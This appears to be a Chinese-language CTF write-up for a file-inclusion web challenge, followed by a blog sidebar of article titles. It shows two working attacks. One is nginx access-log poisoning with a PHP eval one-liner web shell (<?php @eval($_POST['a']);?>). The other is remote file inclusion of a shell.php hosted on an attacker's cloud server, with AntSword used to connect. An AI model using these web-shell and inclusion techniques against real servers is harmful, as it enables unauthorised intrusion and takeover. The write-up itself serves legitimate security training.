打开靶机

发现与web3很相似，测试文件包含未成功

此题有两种解决方法

一、日志注入

查看日志的默认目录，得到了日志文件

?url=/var/log/nginx/access.log

进行日志注入

<?php @eval($_POST['a']);?>

这里需要把一句话木马加在参数里面

用蚁剑进行连接测试

连接成功，在www目录下发现flag.txt文件

查看flag.txt文件内容

成功拿到flag

二、远程文件包含

重新开启一个靶机环境

在购买的阿里云服务器中编写一句话木马（阿里云服务器已启动http协议），添加abc是为了测试是否成功

https://b297bb10-8978-4c85-a1cc-027ebb8a9015.chall.ctf.show/?url=http://xxx.xxx.xxx.xxx/shell.php

看到abc说明测试成功，使用蚁剑或菜刀去连接,这里我使用的是蚁剑，测试连接

在www目录下发现flag

查看flag.txt内容

成功拿到flag

最新文章

1. Linux 下MySql 重置密码
2. JavaScript判断IE版本
3. js获取页面中图片的总数
4. 利用CSS实现带相同间隔地无缝滚动动画
5. linux文件远程传输客户端shell脚本与分布式客户机时间同步脚本
6. phonegap开发经验谈之一命令行建立项目和准备工作
7. 模拟jquery实现each方法和map方法
8. JavaScript字符串常用操作函数之学习笔记
9. Android FM模块学习之三 FM手动调频
10. 164. Maximum Gap
11. Java内存分配和GC
12. 定位于定位优化(iOS)
13. linux下查看文件内容cat,more,less
14. HTTP协议是无状态协议，怎么理解？
15. https post
16. Airtest iOS测试环境部署
17. vs安装问题
18. leetcode 421.Maximum XOR of Two Numbers in an Array
19. [转] HTML5利用WebRTC的getUserMedia获取摄像头信息模拟拍照及视频（完整示例）
20. Mycat安装教程

热门文章

1. Vagrant批量安装CentOS7
2. RocketMQ集群搭建(3m-3s-async)
3. css进阶 05-CSS的一些小知识
4. PHPCMS V9.6.0 SQL注入漏洞分析
5. 在Linux中要修改一个文件夹或文件的权限
6. 利用基于Go Lang的Hugo配合nginx来打造属于自己的纯静态博客系统
7. Docker实例开机启动
8. MySQL 存储函数的创建、调用、查找
9. [.NET] - 在Create一个RSA密钥的是要注意的长度问题
10. ConstraintLayout 学习笔记